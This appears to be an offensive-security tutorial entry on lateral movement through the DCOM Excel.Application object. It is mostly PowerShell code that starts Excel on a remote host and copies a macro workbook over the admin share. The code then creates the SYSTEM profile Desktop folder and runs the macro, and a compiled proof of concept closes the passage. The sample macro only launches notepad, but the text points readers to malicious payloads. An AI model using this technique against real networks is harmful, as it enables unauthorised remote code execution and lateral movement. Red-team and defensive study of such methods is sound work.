Consider the DCOM object Excel.Application:
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110")) # remote IP
$com | Get-Member # enumerate all methods and sub-objectsGet-Member would reveal that Excel.Application has a Run method, which can be used to run macros from a Excel document remotely. We can use this PoC macro below and add it to a Excel spreadsheet (See Examples for malicious payloads):
Sub mymacro()
Shell ("notepad.exe")
End SubUpload the file to the target machine:
$LocalPath = "C:\Users\jeff_admin.corp\myexcel.xls"
$RemotePath = "\\192.168.1.110\c$\myexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)Excel.Application will run with SYSTEM permissions through DCOM. Opening a document and thereby starting a process requires a profile, which SYSTEM doesn’t have by default. Creating a Desktop folder for it resolves the issue:
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)Use Excel.Application.Workbooks.Open to access the uploaded .xls file and run the macro:
$Workbook = $com.Workbooks.Open("C:\myexcel.xls")
$com.Run("mymacro")Here’s a complete PoC compiled from the previous snippets:
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
$LocalPath = "C:\Users\jeff_admin.corp\myexcel.xlsm"
$RemotePath = "\\192.168.1.110\c$\myexcel.xlsm"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$Workbook = $com.Workbooks.Open("C:\myexcel.xlsm")
$com.Run("mymacro")